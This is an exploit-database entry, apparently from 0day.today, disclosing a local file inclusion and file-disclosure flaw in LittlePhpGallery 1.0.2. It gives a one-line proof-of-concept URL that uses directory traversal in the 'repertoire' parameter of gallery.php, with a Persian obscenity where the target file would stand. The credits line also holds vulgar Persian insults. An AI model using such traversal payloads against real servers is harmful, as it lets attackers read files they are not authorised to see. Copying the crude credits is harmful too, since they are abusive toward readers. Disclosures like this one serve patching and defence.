id: 15024
date: 12/02/2010
title: LittlePhpGallery 1.0.2 Local File Inclusion
author: n/a
cves: 

===========================================
LittlePhpGallery 1.0.2 Local File Inclusion
===========================================

# Exploit Title: local file include / File Disclosure
# Date:
# topic:littlePhpGallery
# Author: kire bozorge khavarmiane
 
# Software Link: http://brunetton.tuxfamily.org/progs/littlePhpGallery_1.0.2.tar.gz
 
# Version: 1.0.2
 
# Thanks:  shash pashe naneye decoder , kose tange ameye joker,az hame mohem tar kose r (joon bokonamet az koon)
------------------------------------------------
poc:
/littlePhpGallery_1.0.2/gallery.php?repertoire=..//..//..//..//kire khar
------------------------------------------------



#  0day.today [2023-03-25]  #